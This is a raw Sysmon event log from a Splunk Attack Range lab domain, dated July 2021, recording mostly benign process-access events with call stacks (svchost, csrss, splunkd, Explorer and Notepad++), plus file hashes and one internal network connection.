07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806907Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806906Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806905Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F3CC-60EB-5D79-00000000D001}2560C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806904Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.363{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F3CC-60EB-5D79-00000000D001}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806903Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.349{0C1E0330-F3CC-60EB-5D79-00000000D001}2560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806902Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.082{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=259BC8DB5F033D4ECA4C34BED630EA61,SHA256=43B21024A9843B5E89FC826C5F16881F1D3D0C45642D37E9680C3A732BACFE7F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:28.277{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57216-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806919Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:29.738{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=784910FD995797B3919CDDC767365068,SHA256=B0DA6E80AA168D28128B311F7C9ADF9A6CE0816382764E15ABE4869FB64FF3AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047437Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program 
Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001047435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f|C:\Program Files\Notepad++\notepad++.exe+1675f3|C:\Program Files\Notepad++\notepad++.exe+202e5a|C:\Program Files\Notepad++\notepad++.exe+202686 10341000x80000000000000001047434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4 10341000x80000000000000001047433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.286{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\System32\SHELL32.dll+83770|C:\Windows\System32\SHELL32.dll+8369d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+148bf|C:\Windows\System32\USER32.dll+2e967|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\System32\COMDLG32.dll+13ae4|C:\Program Files\Notepad++\notepad++.exe+169a0f 23542300x80000000000000001047432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.271{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7849814C227CBE92595CBB5907D2AA83,SHA256=ACA831EA5E06DB7FC755DDE21F82351F10137E95599610AC6AAD74357B3D7D9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 
10341000x80000000000000001047429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 
10341000x80000000000000001047426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047424Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 23542300x8000000000000000806918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:29.363{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D6D26D7A3BA5B4D09A3A9CAC9A220705,SHA256=D0327D79C92F305DC0DFA918AF96245A61AA3F7484833E305A17CF6332056B54,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001047423Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:29.055{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
